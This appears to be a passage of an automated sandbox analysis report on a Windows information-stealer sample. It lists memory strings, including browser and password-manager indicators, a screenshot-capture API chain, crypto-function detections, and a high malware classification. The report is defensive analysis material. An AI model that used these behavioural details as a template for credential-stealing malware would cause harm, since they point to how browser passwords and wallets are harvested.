Source: AKEGIIJDGHCAKFHJEHCFIJJEGI.3.dr String found in binary or memory: https://support.mozilla.org
Source: AKEGIIJDGHCAKFHJEHCFIJJEGI.3.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AKEGIIJDGHCAKFHJEHCFIJJEGI.3.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1819825998.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1819825998.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: RegAsm.exe, 00000003.00000002.1819825998.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17-
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: RegAsm.exe, 00000003.00000002.1847160459.00000000276E2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1820758252.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, IEHDBAAFIDGDAAAAAAAA.3.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: HJDBFBKK.3.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegAsm.exe, 00000003.00000002.1847160459.00000000276E2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1820758252.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, IEHDBAAFIDGDAAAAAAAA.3.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: HJDBFBKK.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AKEGIIJDGHCAKFHJEHCFIJJEGI.3.dr String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: AKEGIIJDGHCAKFHJEHCFIJJEGI.3.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: AKEGIIJDGHCAKFHJEHCFIJJEGI.3.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: AKEGIIJDGHCAKFHJEHCFIJJEGI.3.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: AKEGIIJDGHCAKFHJEHCFIJJEGI.3.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.1819825998.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: AKEGIIJDGHCAKFHJEHCFIJJEGI.3.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00419010 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_00419010

System Summary
barindex
.NET source code contains very large array initializations
Source: file.exe, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 314368
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C31ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 3_2_6C31ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C35B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6C35B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C35B8C0 rand_s,NtQueryVirtualMemory, 3_2_6C35B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C35B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 3_2_6C35B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C2FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6C2FF280
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C2F35A0 3_2_6C2F35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C36542B 3_2_6C36542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C335C10 3_2_6C335C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C342C10 3_2_6C342C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C36AC00 3_2_6C36AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C36545C 3_2_6C36545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C305440 3_2_6C305440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3534A0 3_2_6C3534A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C35C4A0 3_2_6C35C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C306C80 3_2_6C306C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C336CF0 3_2_6C336CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C2FD4E0 3_2_6C2FD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C31D4D0 3_2_6C31D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3064C0 3_2_6C3064C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C320512 3_2_6C320512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C31ED10 3_2_6C31ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C30FD00 3_2_6C30FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3585F0 3_2_6C3585F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C330DD0 3_2_6C330DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C359E30 3_2_6C359E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C337E10 3_2_6C337E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C345600 3_2_6C345600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C366E63 3_2_6C366E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C2FC670 3_2_6C2FC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C319E50 3_2_6C319E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C333E50 3_2_6C333E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C314640 3_2_6C314640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C342E4E 3_2_6C342E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C354EA0 3_2_6C354EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C315E90 3_2_6C315E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C35E680 3_2_6C35E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C30FEF0 3_2_6C30FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3676E3 3_2_6C3676E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C2FBEF0 3_2_6C2FBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C337710 3_2_6C337710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C309F00 3_2_6C309F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3477A0 3_2_6C3477A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C326FF0 3_2_6C326FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C2FDFE0 3_2_6C2FDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C33B820 3_2_6C33B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C344820 3_2_6C344820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C307810 3_2_6C307810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C33F070 3_2_6C33F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C318850 3_2_6C318850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C31D850 3_2_6C31D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3260A0 3_2_6C3260A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C31C0E0 3_2_6C31C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3358E0 3_2_6C3358E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3650C7 3_2_6C3650C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C34B970 3_2_6C34B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C36B170 3_2_6C36B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C30D960 3_2_6C30D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C31A940 3_2_6C31A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C32D9B0 3_2_6C32D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C2FC9A0 3_2_6C2FC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C335190 3_2_6C335190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C352990 3_2_6C352990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C339A60 3_2_6C339A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C30CAB0 3_2_6C30CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C362AB0 3_2_6C362AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C2F22A0 3_2_6C2F22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C324AA0 3_2_6C324AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C36BA90 3_2_6C36BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C311AF0 3_2_6C311AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C33E2F0 3_2_6C33E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C338AC0 3_2_6C338AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C33D320 3_2_6C33D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C30C370 3_2_6C30C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C2F5340 3_2_6C2F5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C2FF380 3_2_6C2FF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3653C8 3_2_6C3653C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C466C00 3_2_6C466C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3AAC60 3_2_6C3AAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C47AC30 3_2_6C47AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3FECD0 3_2_6C3FECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C39ECC0 3_2_6C39ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4CAD50 3_2_6C4CAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C46ED70 3_2_6C46ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C528D20 3_2_6C528D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3A4DB0 3_2_6C3A4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C52CDC0 3_2_6C52CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C436D90 3_2_6C436D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C43EE70 3_2_6C43EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C480E20 3_2_6C480E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C440EC0 3_2_6C440EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C426E90 3_2_6C426E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3AAEC0 3_2_6C3AAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C40EF40 3_2_6C40EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3A6F10 3_2_6C3A6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C462F70 3_2_6C462F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4E0F20 3_2_6C4E0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3AEFB0 3_2_6C3AEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C47EFF0 3_2_6C47EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3A0FE0 3_2_6C3A0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4E8FB0 3_2_6C4E8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C474840 3_2_6C474840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3F0820 3_2_6C3F0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C42A820 3_2_6C42A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4A68E0 3_2_6C4A68E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3F6900 3_2_6C3F6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3D8960 3_2_6C3D8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4BC9E0 3_2_6C4BC9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C3D49F0 3_2_6C3D49F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4309A0 3_2_6C4309A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C45A9A0 3_2_6C45A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4609B0 3_2_6C4609B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C41CA70 3_2_6C41CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C44EA00 3_2_6C44EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C458A30 3_2_6C458A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C41EA80 3_2_6C41EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4A6BE0 3_2_6C4A6BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C440BA0 3_2_6C440BA0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C5209D0 appears 113 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C3394D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C32CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004045C0 appears 316 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000000.1691371192.00000000000A2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVQP.exeD vs file.exe
Source: file.exe, 00000000.00000002.1699238755.000000000082E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameVQP.exeD vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/23@0/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C357030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 3_2_6C357030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 3_2_00419600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 3_2_00413720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Users\user\Desktop\file.exe Mutant created: NULL
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.1854092669.000000006C52F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.1852727545.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1838092023.000000001B666000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.1854092669.000000006C52F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.1852727545.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1838092023.000000001B666000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.1854092669.000000006C52F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.1852727545.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1838092023.000000001B666000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.1854092669.000000006C52F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.1852727545.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1838092023.000000001B666000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1854092669.000000006C52F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.1852727545.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1838092023.000000001B666000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.1854092669.000000006C52F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.1852727545.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1838092023.000000001B666000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000003.00000002.1852727545.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1838092023.000000001B666000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: AFIEGCAECGCAEBFHDHIE.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
